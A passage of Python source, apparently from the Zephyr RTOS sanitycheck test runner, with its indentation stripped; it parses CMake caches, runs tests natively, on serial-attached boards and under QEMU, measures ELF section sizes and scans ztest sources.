# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
#there is possibility we polled nothing because
#of host not scheduled QEMU process enough CPU
#time during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state != 'failed':
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
handler.set_state(out_state, handler_time)
if out_state == "timeout":
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.reason = "Failed"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
#sometimes QEMU can't handle SIGTERM signal correctly
#in that case kill -9 QEMU process directly and leave
#sanitycheck judge testing result by console output
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
self.returncode = 0
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
if self.returncode != 0:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_area",
"_k_timer_area",
"_k_mem_slab_area",
"_k_mem_pool_area",
"sw_isr_table",
"_k_sem_area",
"_k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"_k_stack_area",
"_k_msgq_area",
"_k_mbox_area",
"_k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"_k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"object_access",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"_settings_handlers_area",
"_bt_channels_area",
"_bt_br_channels_area",
"_bt_services_area",
"vectors",
"net_socket_register",
"net_ppp_proto"
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
# contextlib makes pylint think main_c isn't subscriptable
# pylint: disable=unsubscriptable-object
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join({match.decode() for match in achtung_matches})
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
